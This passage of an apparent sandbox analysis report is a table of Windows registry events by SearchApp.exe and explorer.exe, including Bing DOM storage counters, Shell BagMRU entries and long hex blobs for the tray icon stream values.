| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010007000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f8c000000000000002000000e6070c004100720067006a00620065007800200033000a005600610067007200650061007200670020006e0070007000720066006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001600000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000000fcc48b78810d90100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e6070c004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000001700000073ae2078e323294282c1e41cb67d5b9c000000000000000000000000ba56f3b58810d90100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a0066000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000500000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e6070900420061007200510065007600690072000a004100620067002000660076007400610072007100200076006100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000700000000000000000000000000000000000000000000000000000000000000d15c0588f2bdd80100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e60709000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000075ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e60709000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000081ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e60709000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000082ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e60709000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "10524" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "10524" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "140" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "888" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "140" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001001800000014000000494c200618002400280010001000ffffffff2110ffffffffffffffff424d3600000000000000360000002800000010000000400200000100200000000000009000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000